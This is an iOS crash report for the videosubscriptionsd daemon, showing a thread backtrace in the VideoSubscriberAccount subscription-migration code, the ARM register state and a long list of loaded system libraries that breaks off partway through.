Thread 3 name: Dispatch queue: com.apple.VideoSubscriberAccount.SubscriptionMigration (QOS: UNSPECIFIED) Thread 3 Crashed: 0 libobjc.A.dylib 0x182b2c1a0 0x182b08000 + 0x241a0 // objcretain + 0x10 1 VideoSubscriberAccount 0x195e084fc 0x195dbb000 + 0x4d4fc // __59-[VSSubscriptionPersistentContainer _performBlock:andWait:]_block_invoke + 0x48 2 Foundation 0x18437ee88 0x184289000 + 0xf5e88 // __NSBLOCKOPERATION_IS_CALLING_OUT_TO_A_BLOCK_ + 0x10 3 Foundation 0x1842c08d0 0x184289000 + 0x378d0 // -[NSBlockOperation main] + 0x48 4 Foundation 0x1842bfcac 0x184289000 + 0x36cac // -[__NSOperationInternal _start:] + 0x350 5 libdispatch.dylib 0x183248ae4 0x183247000 + 0x1ae4 // _dispatch_client_callout + 0x10 6 libdispatch.dylib 0x1832501f4 0x183247000 + 0x91f4 // _dispatch_block_invoke_direct$VARIANT$mp + 0xe0 7 libdispatch.dylib 0x183248ae4 0x183247000 + 0x1ae4 // _dispatch_client_callout + 0x10 8 libdispatch.dylib 0x1832501f4 0x183247000 + 0x91f4 // _dispatch_block_invoke_direct$VARIANT$mp + 0xe0 9 libdispatch.dylib 0x1832500e0 0x183247000 + 0x90e0 // dispatch_block_perform$VARIANT$mp + 0x68 10 Foundation 0x184380750 0x184289000 + 0xf7750 // __NSOQSchedule_f + 0x178 11 libdispatch.dylib 0x183248ae4 0x183247000 + 0x1ae4 // _dispatch_client_callout + 0x10 12 libdispatch.dylib 0x183250f18 0x183247000 + 0x9f18 // _dispatch_continuation_pop$VARIANT$mp + 0x1a8 13 libdispatch.dylib 0x18324f850 0x183247000 + 0x8850 // _dispatch_async_redirect_invoke$VARIANT$mp + 0x25c 14 libdispatch.dylib 0x183255d30 0x183247000 + 0xed30 // _dispatch_root_queue_drain + 0x24c 15 libdispatch.dylib 0x183255a80 0x183247000 + 0xea80 // _dispatch_worker_thread3 + 0x78 16 libsystem_pthread.dylib 0x18357bfac 0x18357b000 + 0xfac // _pthread_wqthread + 0x498 17 libsystem_pthread.dylib 0x18357bb08 0x18357b000 + 0xb08 // start_wqthread + 0x4
Thread 4: 0 libsystem_pthread.dylib 0x18357bb04 0x18357b000 + 0xb04 // start_wqthread + 0x0
Thread 5: 0 libsystem_pthread.dylib 0x18357bb04 0x18357b000 + 0xb04 // start_wqthread + 0x0
Thread 3 crashed with ARM Thread State (64-bit): x0: 0x0000000143d03290 x1: 0x0000000000001003 x2: 0x0000000000001003 x3: 0x0000000000000001 x4: 0x0000000000000001 x5: 0x0000000100000028 x6: 0x0000000004410103 x7: 0x00000000000010ff x8: 0x00000000143d4780 x9: 0x999f8fdfa59800f7 x10: 0x0000000104d80060 x11: 0x0000000143d14000 x12: 0x0000000000007594 x13: 0x0000000000007594 x14: 0x0000000000007594 x15: 0x0000000000000001 x16: 0x0000000183576c78 x17: 0x0000000020000000 x18: 0x0000000000000000 x19: 0x0000000104d80058 x20: 0x0000000143d44580 x21: 0x0000000143d44580 x22: 0x0000000000000000 x23: 0x000000016b2d30e0 x24: 0x00000001b3db7000 x25: 0x00000000000000d8 x26: 0x00000001b3db7000 x27: 0x00000001b3db4000 x28: 0x00000001b3db7000 fp: 0x000000016b2d2a10 lr: 0x0000000195e084fc sp: 0x000000016b2d2970 pc: 0x0000000182b2c1a0 cpsr: 0x60000000
Binary Images (dpkg):
Binary Images (App Store):
Binary Images (Other): 0x104ccc000 - 0x104ccffff videosubscriptionsd arm64 <4393dd0905a73139860528464675670a> /uslibexec/videosubscriptionsd 0x104e88000 - 0x104ec3fff dyld arm64 <06dc98224ae03573bf72c78810c81a78> /uslib/dyld 0x182a8a000 - 0x182a8bfff libSystem.B.dylib arm64 <1cbfa6a1a0fb3fc99264d3d30ca0e543> /uslib/libSystem.B.dylib 0x182a8c000 - 0x182ae4fff libc++.1.dylib arm64 /uslib/libc++.1.dylib 0x182ae5000 - 0x182b06fff libc++abi.dylib arm64 <086faefd537e3954b23565f56653a2cb> /uslib/libc++abi.dylib 0x182b08000 - 0x1831c3fff libobjc.A.dylib arm64 /uslib/libobjc.A.dylib 0x1831c4000 - 0x1831c9fff libcache.dylib arm64 <9234c7627b253d1ba2b18cd9aaadbe2e> /uslib/system/libcache.dylib 0x1831ca000 - 0x1831d5fff libcommonCrypto.dylib arm64 <50eeb933dceb3aa28a43dd3a791139ce> /uslib/system/libcommonCrypto.dylib 0x1831d6000 - 0x1831d9fff libcompiler_rt.dylib arm64 /uslib/system/libcompiler_rt.dylib 0x1831da000 - 0x1831e2fff libcopyfile.dylib arm64 /uslib/system/libcopyfile.dylib 0x1831e3000 - 0x183246fff libcorecrypto.dylib arm64 /uslib/system/libcorecrypto.dylib 0x183247000 - 0x1832acfff libdispatch.dylib arm64 <42fe29ae709d39d9bc00f31af92baaf1> /uslib/system/libdispatch.dylib 0x1832ad000 - 0x1832c7fff libdyld.dylib arm64 /uslib/system/libdyld.dylib 0x1832c8000 - 0x1832c8fff liblaunch.dylib arm64 <5d50c01da0fb3538bce8415db84cf1eb> /uslib/system/liblaunch.dylib 0x1832c9000 - 0x1832cefff libmacho.dylib arm64 /uslib/system/libmacho.dylib 0x1832cf000 - 0x1832d0fff libremovefile.dylib arm64 /uslib/system/libremovefile.dylib 0x1832d1000 - 0x1832e7fff libsystem_asl.dylib arm64 <5d19da723b2d3036b96bbe9569d99d5b> /uslib/system/libsystem_asl.dylib 0x1832e8000 - 0x1832e8fff libsystem_blocks.dylib arm64 <9a69557f7f5d35e6b2bb4c8cb55b43b6> /uslib/system/libsystem_blocks.dylib 0x1832e9000 - 0x183366fff libsystem_c.dylib arm64 <253425c2089e3d4d99cc1d073d72efe5> /uslib/system/libsystem_c.dylib 0x183367000 - 0x18336bfff libsystem_configuration.dylib arm64 <1f70ae27eb2d31ecb98b4b45f5b82ad9> /uslib/system/libsystem_configuration.dylib 0x18336c000 - 0x183371fff libsystem_containermanager.dylib arm64 <3a312c5c347d3fcab6227fb824849657> /uslib/system/libsystem_containermanager.dylib 0x183372000 - 0x183373fff libsystem_coreservices.dylib arm64 <70bb743b7bf53de1afdf6f7afcce1379> /uslib/system/libsystem_coreservices.dylib 0x183374000 - 0x183375fff libsystem_darwin.dylib arm64 <90fe2ed455e4396aa662e5e32fd80b84> /uslib/system/libsystem_darwin.dylib 0x183376000 - 0x18337cfff libsystem_dnssd.dylib arm64 <45af7516ceab3b94905cd74b35f4eab6> /uslib/system/libsystem_dnssd.dylib 0x18337d000 - 0x1833bafff libsystem_info.dylib arm64 <515624006f30300186f77a218ef98326> /uslib/system/libsystem_info.dylib 0x1833bb000 - 0x1833e3fff libsystem_kernel.dylib arm64 /uslib/system/libsystem_kernel.dylib 0x1833e4000 - 0x183411fff libsystem_m.dylib arm64 /uslib/system/libsystem_m.dylib 0x183412000 - 0x18342dfff libsystem_malloc.dylib arm64 /uslib/system/libsystem_malloc.dylib 0x18342e000 - 0x183559fff libsystem_network.dylib arm64 <6762e60b7af83d2e86468be0ac6b4fa0> /uslib/system/libsystem_network.dylib 0x18355a000 - 0x183565fff libsystem_networkextension.dylib arm64 /uslib/system/libsystem_networkextension.dylib 0x183566000 - 0x183570fff libsystem_notify.dylib arm64 <5bd9385d98c83d0ba9d157e69c429638> /uslib/system/libsystem_notify.dylib 0x183571000 - 0x18357afff libsystem_platform.dylib arm64 <038fc12926e83453a11b59ef3b1096c9> /uslib/system/libsystem_platform.dylib 0x18357b000 - 0x18358afff libsystem_pthread.dylib arm64 <01327cdfaac23c388fadf36cf440f0e2> /uslib/system/libsystem_pthread.dylib 0x18358b000 - 0x18358efff libsystem_sandbox.dylib arm64 /uslib/system/libsystem_sandbox.dylib 0x18358f000 - 0x183596fff libsystem_symptoms.dylib arm64 <7fc5e7245e09393aa5d003dceeffa74b> /uslib/system/libsystem_symptoms.dylib 0x183597000 - 0x1835aafff libsystem_trace.dylib arm64 <9bfe9e9e10b9385787a827c768ba54bf> /uslib/system/libsystem_trace.dylib 0x1835ab000 - 0x1835b0fff libunwind.dylib arm64 <7e526b97e5b039e6a1c78107321592aa> /uslib/system/libunwind.dylib 0x1835b1000 - 0x1835b1fff libvminterpose.dylib arm64 <39d037ec6db036179470ab258fc96c13> /uslib/system/libvminterpose.dylib 0x1835b2000 - 0x1835dcfff libxpc.dylib arm64 <9bc6486ebaa83cc580e90415889c978d> /uslib/system/libxpc.dylib 0x1835dd000 - 0x1837fefff libicucore.A.dylib arm64 /uslib/libicucore.A.dylib 0x1837ff000 - 0x183810fff libz.1.dylib arm64 <39dcd0297ee130c891937f50ce23c2df> /uslib/libz.1.dylib 0x183811000 - 0x183ba7fff CoreFoundation arm64 /System/Library/Frameworks/CoreFoundation.framework/CoreFoundation 0x183ba8000 - 0x183bb8fff libbsm.0.dylib arm64 <3f8b35c8ab283b78a319327ea597212e> /uslib/libbsm.0.dylib 0x183bb9000 - 0x183bb9fff libenergytrace.dylib arm64 /uslib/libenergytrace.dylib 0x183bba000 - 0x183c3efff IOKit arm64 <56754e706db43267b2e2bc4387e34f2b> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit 0x183c3f000 - 0x183d26fff libxml2.2.dylib arm64 <21cc9796ecb933e8b3e12f53e04148f7> /uslib/libxml2.2.dylib 0x183d27000 - 0x183d34fff libbz2.1.0.dylib arm64 <63ddef9a83dc335a9df0bef913f437a7> /uslib/libbz2.1.0.dylib 0x183d35000 - 0x183d4dfff liblzma.5.dylib arm64 <252187562a8c3e07b7f01473a16c00d7> /uslib/liblzma.5.dylib 0x183d4e000 - 0x183eb2fff libsqlite3.dylib arm64 /uslib/libsqlite3.dylib 0x183eb3000 - 0x183ed9fff libMobileGestalt.dylib arm64 <816e5c2426243ca5a8e6b3b2b9521776> /uslib/libMobileGestalt.dylib 0x183eda000 - 0x184288fff CFNetwork arm64 <4f38683f50453eaa9a09eb6222eae139> /System/Library/Frameworks/CFNetwork.framework/CFNetwork 0x184289000 - 0x184581fff Foundation arm64 <18908b96750c38988eb0d7028c656a6d> /System/Library/Frameworks/Foundation.framework/Foundation 0x184582000 - 0x184682fff Security arm64 /System/Library/Frameworks/Security.framework/Security 0x184683000 - 0x1846eefff SystemConfiguration arm64 <0caa3f1372c637f791d1aae47629aed1> /System/Library/Frameworks/SystemConfiguration.framework/SystemConfiguration 0x1846ef000 - 0x184724fff libCRFSuite.dylib arm64 <7d19be0f618136a1a3bc7e81caba4b6d> /uslib/libCRFSuite.dylib 0x184725000 - 0x184725fff libapple_crypto.dylib arm64 /uslib/libapple_crypto.dylib 0x184726000 - 0x18473cfff libapple_nghttp2.dylib arm64 <8d5134e490ad3c298330609806547a9e> /uslib/libapple_nghttp2.dylib 0x18473d000 - 0x184766fff libarchive.2.dylib arm64 <93fac4c1f6b73383a9082c6a963da406> /uslib/libarchive.2.dylib 0x184767000 - 0x184815fff libboringssl.dylib arm64 <8b812051a23e35b8a22e4c272887ecf7> /uslib/libboringssl.dylib 0x184816000 - 0x18482cfff libcoretls.dylib arm64 /uslib/libcoretls.dylib 0x18482d000 - 0x18482efff libcoretls_cfhelpers.dylib arm64 /uslib/libcoretls_cfhelpers.dylib 0x18482f000 - 0x184830fff liblangid.dylib arm64 /uslib/liblangid.dylib 0x184831000 - 0x1849a6fff libnetwork.dylib arm64 /uslib/libnetwork.dylib 0x1849a7000 - 0x1849d9fff libpcap.A.dylib arm64 <36ff48f819553b0c9e92c9fb2aa1a4a2> /uslib/libpcap.A.dylib 0x1849da000 - 0x184a36fff libusrtcp.dylib arm64 /uslib/libusrtcp.dylib 0x184a37000 - 0x184a41fff IOSurface arm64 /System/Library/Frameworks/IOSurface.framework/IOSurface 0x184a42000 - 0x184ae7fff libBLAS.dylib arm64 <50b5f5beeab037ffa5810a67e580bdbf> /System/Library/Frameworks/Accelerate.framework/Frameworks/vecLib.framework/libBLAS.dylib 0x184ae8000 - 0x184e08fff libLAPACK.dylib arm64 /System/Library/Frameworks/Accelerate.framework/Frameworks/vecLib.framework/libLAPACK.dylib 0x184e09000 - 0x185078fff vImage arm64 <8f3ffa6be7e43dfdaf027891d655a60e> /System/Library/Frameworks/Accelerate.framework/Frameworks/vImage.framework/vImage 0x185079000 - 0x18508afff libSparseBLAS.dylib arm64 /System/Library/Frameworks/Accelerate.framework/Frameworks/vecLib.framework/libSparseBLAS.dylib 0x18508b000 - 0x1850affff libvMisc.dylib arm64 <483df9b3d90331888b43bb65d802485f> /System/Library/Frameworks/Accelerate.framework/Frameworks/vecLib.framework/libvMisc.dylib 0x1850b0000 - 0x1850d7fff libBNNS.dylib arm64 <982f32f4102133d2802ea5f81cdc13a8> /System/Library/Frameworks/Accelerate.framework/Frameworks/vecLib.framework/libBNNS.dylib 0x1850d8000 - 0x1850ecfff libLinearAlgebra.dylib arm64 /System/Library/Frameworks/Accelerate.framework/Frameworks/vecLib.framework/libLinearAlgebra.dylib 0x1850ed000 - 0x1850f1fff libQuadrature.dylib arm64 <5a98c0d39e0d38f89ce20797be797ac8> /System/Library/Frameworks/Accelerate.framework/Frameworks/vecLib.framework/libQuadrature.dylib 0x1850f2000 - 0x185161fff libSparse.dylib arm64 <6556be33563434b78e2ef1c80da99eb7> /System/Library/Frameworks/Accelerate.framework/Frameworks/vecLib.framework/libSparse.dylib 0x185162000 - 0x1851edfff libvDSP.dylib arm64 <4de8af8c7371382b9183e4dc14245445> /System/Library/Frameworks/Accelerate.framework/Frameworks/vecLib.framework/libvDSP.dylib 0x1851ee000 - 0x1851eefff vecLib arm64 <2d93d3f4573b313d81fc9104810f0f61> /System/Library/Frameworks/Accelerate.framework/Frameworks/vecLib.framework/vecLib 0x1851ef000 - 0x1851effff Accelerate arm64 <850c55e76100327ea543af936487944c> /System/Library/Frameworks/Accelerate.framework/Accelerate 0x1851f0000 - 0x185206fff libcompression.dylib arm64 <9a090a94c6463eefa5413f012a34d3a4> /uslib/libcompression.dylib 0x185207000 - 0x18574efff CoreGraphics arm64 /System/Library/Frameworks/CoreGraphics.framework/CoreGraphics 0x18574f000 - 0x185754fff IOAccelerator arm64 <83c3c1fcfd963ec4b3c15ca18ea71efe> /System/Library/PrivateFrameworks/IOAccelerator.framework/IOAccelerator 0x185755000 - 0x18575afff libCoreFSCache.dylib arm64 /System/Library/Frameworks/OpenGLES.framework/libCoreFSCache.dylib 0x18575b000 - 0x1857f3fff Metal arm64 <46fc1e5f11c5316991cb5d7a0aa46523> /System/Library/Frameworks/Metal.framework/Metal 0x1857f4000 - 0x185807fff GraphicsServices arm64 <85072ece665a3a86807f153e85476fed> /System/Library/PrivateFrameworks/GraphicsServices.framework/GraphicsServices 0x185808000 - 0x185961fff MobileCoreServices arm64 /System/Library/Frameworks/MobileCoreServices.framework/MobileCoreServices 0x185962000 - 0x185964fff IOSurfaceAccelerator arm64 <7b5129072b7f3d128f701b1b950bcdf3> /System/Library/PrivateFrameworks/IOSurfaceAccelerator.framework/IOSurfaceAccelerator 0x185965000 - 0x1859a6fff AppleJPEG arm64 /System/Library/PrivateFrameworks/AppleJPEG.framework/AppleJPEG 0x1859a7000 - 0x185f57fff ImageIO arm64 /System/Library/Frameworks/ImageIO.framework/ImageIO 0x185f58000 - 0x185fbbfff BaseBoard arm64 <4a9ddf31f3443b6e9a17e272aebe2b8d> /System/Library/PrivateFrameworks/BaseBoard.framework/BaseBoard 0x185fbc000 - 0x185fd3fff AssertionServices arm64 /System/Library/PrivateFrameworks/AssertionServices.framework/AssertionServices 0x185fd4000 - 0x185fdcfff CorePhoneNumbers arm64 <2cacbb2a053f314d9c6b6df55b4cea0c> /System/Library/PrivateFrameworks/CorePhoneNumbers.framework/CorePhoneNumbers 0x185fdd000 - 0x186021fff AppSupport arm64 /System/Library/PrivateFrameworks/AppSupport.framework/AppSupport 0x186022000 - 0x18603afff CrashReporterSupport arm64 <5599d0094f603297a23dfaf2643c0214> /System/Library/PrivateFrameworks/CrashReporterSupport.framework/CrashReporterSupport 0x18603b000 - 0x186040fff AggregateDictionary arm64 <3e27a71f9459361193f3e182dc87d3b0> /System/Library/PrivateFrameworks/AggregateDictionary.framework/AggregateDictionary 0x186041000 - 0x1860c5fff libTelephonyUtilDynamic.dylib arm64 /uslib/libTelephonyUtilDynamic.dylib 0x1860c6000 - 0x1860e5fff ProtocolBuffer arm64 /System/Library/PrivateFrameworks/ProtocolBuffer.framework/ProtocolBuffer 0x1860e6000 - 0x186112fff MobileKeyBag arm64 <19ed6cab7991380796131d9815a7e3df> /System/Library/PrivateFrameworks/MobileKeyBag.framework/MobileKeyBag 0x186113000 - 0x186147fff BackBoardServices arm64 /System/Library/PrivateFrameworks/BackBoardServices.framework/BackBoardServices 0x186148000 - 0x1861a3fff FrontBoardServices arm64 <1f63db3e11403909903a700f99bbafe5> /System/Library/PrivateFrameworks/FrontBoardServices.framework/FrontBoardServices 0x1861a4000 - 0x1861e0fff SpringBoardServices arm64 <618c22ec2c98329f8bb23caa50a4f53c> /System/Library/PrivateFrameworks/SpringBoardServices.framework/SpringBoardServices 0x1861e1000 - 0x1861effff PowerLog arm64 <85efbdc068743b57a7dc8cf1115869ae> /System/Library/PrivateFrameworks/PowerLog.framework/PowerLog 0x1861f0000 - 0x18620cfff CommonUtilities arm64 /System/Library/PrivateFrameworks/CommonUtilities.framework/CommonUtilities 0x18620d000 - 0x186218fff liblockdown.dylib arm64 <6ca17ea36c9b3d8a80b1b4d147ba35f9> /uslib/liblockdown.dylib 0x186219000 - 0x18651dfff CoreData arm64 /System/Library/Frameworks/CoreData.framework/CoreData 0x18651e000 - 0x186524fff TCC arm64 <5b6e4c731ff931a499b5c45cfd742c6c> /System/Library/PrivateFrameworks/TCC.framework/TCC 0x186525000 - 0x18652cfff libcupolicy.dylib arm64 /uslib/libcupolicy.dylib 0x18652d000 - 0x1865befff CoreTelephony arm64 <8eae2d2fbbc83aa88fc94e48a88443d1> /System/Library/Frameworks/CoreTelephony.framework/CoreTelephony 0x1865bf000 - 0x186616fff Accounts arm64 /System/Library/Frameworks/Accounts.framework/Accounts 0x186617000 - 0x186640fff AppleSauce arm64 <708bf2e767363eaaae3d41e17e0a0e86> /System/Library/PrivateFrameworks/AppleSauce.framework/AppleSauce 0x186641000 - 0x186649fff DataMigration arm64 <3db16bbf04603c5da1bd70c06c7cb464> /System/Library/PrivateFrameworks/DataMigration.framework/DataMigration 0x18664a000 - 0x186650fff Netrb arm64 /System/Library/PrivateFrameworks/Netrb.framework/Netrb 0x186651000 - 0x186683fff PersistentConnection arm64 <644d574b0cb33cf0bcaa55f353b636d1> /System/Library/PrivateFrameworks/PersistentConnection.framework/PersistentConnection 0x186684000 - 0x186695fff libmis.dylib arm64 <750810cf779d3946964aa5ee4a44f063> /uslib/libmis.dylib 0x186696000 - 0x18679cfff ManagedConfiguration arm64 /System/Library/PrivateFrameworks/ManagedConfiguration.framework/ManagedConfiguration 0x18679d000 - 0x1867a2fff libReverseProxyDevice.dylib arm64 <7c2f9a593dd03a90855450c4b3b2208e> /uslib/libReverseProxyDevice.dylib 0x1867a3000 - 0x1867b5fff libamsupport.dylib arm64 <6c1d65704dfc3b9b87980cd65560188e> /uslib/libamsupport.dylib 0x1867b6000 - 0x1867bbfff libCoreVMClient.dylib arm64 <8cfed6ca663f30748dd58b598a23169d> /System/Library/Frameworks/OpenGLES.framework/libCoreVMClient.dylib 0x1867bc000 - 0x1867bdfff libCVMSPluginSupport.dylib arm64 <4bf21a6ca33d3222bd1442c13450464d> /System/Library/Frameworks/OpenGLES.framework/libCVMSPluginSupport.dylib 0x1867be000 - 0x1867c1fff libutil.dylib arm64 <2f7e5961d4b734b496f3d85eae03acd1> /uslib/libutil.dylib 0x1867c2000 - 0x186802fff libGLImage.dylib arm64 <9c2f70ff46913e4f9dc66605475914f9> /System/Library/Frameworks/OpenGLES.framework/libGLImage.dylib 0x186803000 - 0x186879fff APFS arm64 <075ddba3fa093db78988256945f50ff9> /System/Library/PrivateFrameworks/APFS.framework/APFS 0x18687a000 - 0x1868abfff MediaKit arm64 <82856e94773c33f5a67a8eb4c1c6148e> /System/Library/PrivateFrameworks/MediaKit.framework/MediaKit 0x1868ac000 - 0x1868c4fff libSERestoreInfo.dylib arm64 <3cb3e784ed3e389894f58e4b9fc7bb4e> /uslib/updaters/libSERestoreInfo.dylib 0x1868c9000 - 0x186905fff DiskImages arm64 <198c6094f9c237698130c80de266469b> /System/Library/PrivateFrameworks/DiskImages.framework/DiskImages 0x186906000 - 0x18690ffff libGFXShared.dylib arm64 /System/Library/Frameworks/OpenGLES.framework/libGFXShared.dylib 0x186910000 - 0x186957fff libauthinstall.dylib arm64 /uslib/libauthinstall.dylib 0x186958000 - 0x186960fff IOMobileFramebuffer arm64 /System/Library/PrivateFrameworks/IOMobileFramebuffer.framework/IOMobileFramebuffer 0x186961000 - 0x18696cfff OpenGLES arm64 /System/Library/Frameworks/OpenGLES.framework/OpenGLES 0x18696d000 - 0x1869f4fff ColorSync arm64 <5959a19f99dc3ed1b0553dc055c18347> /System/Library/PrivateFrameworks/ColorSync.framework/ColorSync 0x1869f5000 - 0x186a1efff CoreVideo arm64 <740eb305ad133ba9ad42b2334b4c4ef5> /System/Library/Frameworks/CoreVideo.framework/CoreVideo 0x186a1f000 - 0x186a20fff libCTGreenTeaLogger.dylib arm64 /uslib/libCTGreenTeaLogger.dylib 0x186a21000 - 0x186b8dfff CoreAudio arm64 <8c29fcd6f30b3943bf20b01aeb0e04f6> /System/Library/Frameworks/CoreAudio.framework/CoreAudio 0x186b8e000 - 0x186bbcfff CoreAnalytics arm64 <97087dc402a73b5d9d71d9e6e230991c> /System/Library/PrivateFrameworks/CoreAnalytics.framework/CoreAnalytics 0x186bbd000 - 0x186bc0fff UserFS arm64 <26dc70e76d613a75aecc6a3fb815199c> /System/Library/PrivateFrameworks/UserFS.framework/UserFS 0x186bc1000 - 0x186d3dfff CoreMedia arm64 <5b1204613571323abde92fc7e94d5995> /System/Library/Frameworks/CoreMedia.framework/CoreMedia 0x186d3e000 - 0x186d50fff libprotobuf-lite.dylib arm64 <1a1686915f8b343ba80bea61f7bfb250> /uslib/libprotobuf-lite.dylib 0x186d51000 - 0x186db5fff libprotobuf.dylib arm64 <0f2b421fec773e7a8c4dc240454fd2bd> /uslib/libprotobuf.dylib 0x186db6000 - 0x187079fff libAWDSupportFramework.dylib arm64 <1293c8fa59113426a524963ad2960534> /uslib/libAWDSupportFramework.dylib 0x18707a000 - 0x1870c3fff WirelessDiagnostics arm64 /System/Library/PrivateFrameworks/WirelessDiagnostics.framework/WirelessDiagnostics 0x1870c4000 - 0x18717bfff VideoToolbox arm64 /System/Library/Frameworks/VideoToolbox.framework/VideoToolbox 0x18717c000 - 0x187285fff libFontParser.dylib arm64 <4f1c4137cd9a327f9cfe6befb8772ecc> /System/Library/PrivateFrameworks/FontServices.framework/libFontParser.dylib 0x187286000 - 0x187287fff FontServices arm64 /System/Library/PrivateFrameworks/FontServices.framework/FontServices 0x187288000 - 0x1873dbfff CoreText arm64 <77db300ece0c3f60880c9c37d0328f09> /System/Library/Frameworks/CoreText.framework/CoreText 0x1873dc000 - 0x1873ebfff IntlPreferences arm64 /System/Library/PrivateFrameworks/IntlPreferences.framework/IntlPreferences 0x1873ec000 - 0x1873f4fff RTCReporting arm64 <4a3fab43886f3e6a80eff6d701c81c42> /System/Library/PrivateFrameworks/RTCReporting.framework/RTCReporting 0x1873f5000 - 0x187465fff CoreBrightness arm64 <09c973cf66153394aafc1d30404b2124> /System/Library/PrivateFrameworks/CoreBrightness.framework/CoreBrightness 0x187466000 - 0x187470fff libAudioStatistics.dylib arm64 /uslib/libAudioStatistics.dylib 0x187471000 - 0x1879a9fff AudioToolbox arm64 /System/Library/Frameworks/AudioToolbox.framework/AudioToolbox 0x1879aa000 - 0x187bddfff QuartzCore arm64 <3b0f2dc265b03c6badac432a3bd1a26f> /System/Library/Frameworks/QuartzCore.framework/QuartzCore 0x187bde000 - 0x187be9fff MediaAccessibility arm64 <3bbdb8fbf36c387fb7ac14d5a0becfd4> /System/Library/Frameworks/MediaAccessibility.framework/MediaAccessibility 0x187bea000 - 0x187cdcfff libiconv.2.dylib arm64 /uslib/libiconv.2.dylib 0x187cdd000 - 0x187cf8fff NetworkStatistics arm64 <4bc8202c17113cbbbedec9d698607ad8> /System/Library/PrivateFrameworks/NetworkStatistics.framework/NetworkStatistics 0x187cf9000 - 0x187d14fff MPSCore arm64 /System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSCore.framework/MPSCore 0x187d15000 - 0x187d7dfff MPSImage arm64 /System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSImage.framework/MPSImage 0x187d7e000 - 0x187da0fff MPSMatrix arm64 <51eed27dc958331185498c57d285488c> /System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSMatrix.framework/MPSMatrix 0x187da1000 - 0x187daffff CoreAUC arm64 <2224d1a7332a3d3086784b512a37864c> /System/Library/PrivateFrameworks/CoreAUC.framework/CoreAUC 0x187db0000 - 0x188405fff MediaToolbox arm64 /System/Library/Frameworks/MediaToolbox.framework/MediaToolbox 0x188406000 - 0x188535fff MPSNeuralNetwork arm64 <88bcea2c366b31a68c58df71a7f334ef> /System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSNeuralNetwork.framework/MPSNeuralNetwork 0x188536000 - 0x188536fff MetalPerformanceShaders arm64 <19616d7864ed39bd92fa2f834bea5e92> /System/Library/Frameworks/MetalPerformanceShaders.framework/MetalPerformanceShaders 0x188537000 - 0x188961fff FaceCore arm64 <5e413f9639833bd582d1626f1324d0bf> /System/Library/PrivateFrameworks/FaceCore.framework/FaceCore 0x188962000 - 0x18896ffff GraphVisualizer arm64 <8717060f6a11307eb90d4c68ab8026ba> /System/Library/PrivateFrameworks/GraphVisualizer.framework/GraphVisualizer 0x188970000 - 0x188b17fff libFosl_dynamic.dylib arm64 /uslib/libFosl_dynamic.dylib 0x188b18000 - 0x188d7bfff CoreImage arm64 /System/Library/Frameworks/CoreImage.framework/CoreImage 0x188d7c000 - 0x188f7afff CoreMotion arm64 <47fb319b10c53669bcef50c4ee34d0c1> /System/Library/Frameworks/CoreMotion.framework/CoreMotion 0x188f7b000 - 0x188fa9fff CoreBluetooth arm64 /System/Library/Frameworks/CoreBluetooth.framework/CoreBluetooth 0x188fcd000 - 0x1891f8fff Celestial arm64 <0db0bceb08073225810e08ca28af72ab> /System/Library/PrivateFrameworks/Celestial.framework/Celestial 0x1891f9000 - 0x18927bfff Quagga arm64 <95fb120567723673a0c85b1b91f1a67a> /System/Library/PrivateFrameworks/Quagga.framework/Quagga 0x18927c000 - 0x189372fff AVFAudio arm64 /System/Library/Frameworks/AVFoundation.framework/Frameworks/AVFAudio.framework/AVFAudio 0x189373000 - 0x189564fff AVFoundation arm64 <6fa521ecbea43fb6888cdbf49ed19506> /System/Library/Frameworks/AVFoundation.framework/AVFoundation 0x18960e000 - 0x189616fff SymptomDiagnosticReporter arm64 <32a292fd7bac35528f161a9c3d8e24e6> /System/Library/PrivateFrameworks/SymptomDiagnosticReporter.framework/SymptomDiagnosticReporter 0x18a15f000 - 0x18a15ffff PhoneNumbers arm64 /System/Library/PrivateFrameworks/PhoneNumbers.framework/PhoneNumbers 0x18ba06000 - 0x18ba68fff ContactsFoundation arm64 <957d69d66b6e317d90ce669eda861706> /System/Library/PrivateFrameworks/ContactsFoundation.framework/ContactsFoundation 0x18d2b7000 - 0x18d2dffff DataAccessExpress arm64 <8e3311f934e53459b1a50a56a8f072e1> /System/Library/PrivateFrameworks/DataAccessExpress.framework/DataAccessExpress 0x18d2e0000 - 0x18d37afff AddressBookLegacy arm64 <9f96f3b0e89b37b38c4a0ac13b9fed3d> /System/Library/PrivateFrameworks/AddressBookLegacy.framework/AddressBookLegacy 0x18d404000 - 0x18d40ffff AppleIDAuthSupport arm64 <9a58a7b3913a36e7b80931230c9adac1> /System/Library/PrivateFrameworks/AppleIDAuthSupport.framework/AppleIDAuthSupport 0x18d410000 - 0x18d460fff AuthKit arm64 <7b2eebc84315383e94b83f787ed9a111> /System/Library/PrivateFrameworks/AuthKit.framework/AuthKit 0x18e7cc000 - 0x18e8e8fff Network arm64 /System/Library/PrivateFrameworks/Network.framework/Network 0x18eaf1000 - 0x18eb0bfff libresolv.9.dylib arm64 <7c4f57d578193d9fa2b41e55d2df2db2> /uslib/libresolv.9.dylib 0x18eb0f000 - 0x18eb44fff libtidy.A.dylib arm64 /uslib/libtidy.A.dylib 0x18ecaa000 - 0x18ed15fff IMFoundation arm64 <6b4b6b92108e33baa7f8381d42cccfec> /System/Library/PrivateFrameworks/IMFoundation.framework/IMFoundation 0x18ee53000 - 0x18ee54fff DiagnosticLogCollection arm64 /System/Library/PrivateFrameworks/DiagnosticLogCollection.framework/DiagnosticLogCollection 0x18ee55000 - 0x18ee56fff Marco arm64 <865c2a3744c13039941e7f92aaf9bcaf> /System/Library/PrivateFrameworks/Marco.framework/Marco 0x18ee57000 - 0x18ee61fff MessageProtection arm64 <6dd7d2b068083337830d3fac1c9cef2b> /System/Library/PrivateFrameworks/MessageProtection.framework/MessageProtection 0x18ee62000 - 0x18f170fff StoreServices arm64 /System/Library/PrivateFrameworks/StoreServices.framework/StoreServices 0x18f171000 - 0x18f188fff Engram arm64 /System/Library/PrivateFrameworks/Engram.framework/Engram 0x18f189000 - 0x18f279fff IDSFoundation arm64 <08d21d4abe023b57bc062df7b9f71f1b> /System/Library/PrivateFrameworks/IDSFoundation.framework/IDSFoundation 0x18f614000 - 0x18f72afff IDS arm64 <16a330e0018b33738d123c494e800dbc> /System/Library/PrivateFrameworks/IDS.framework/IDS 0x18f961000 - 0x18f965fff 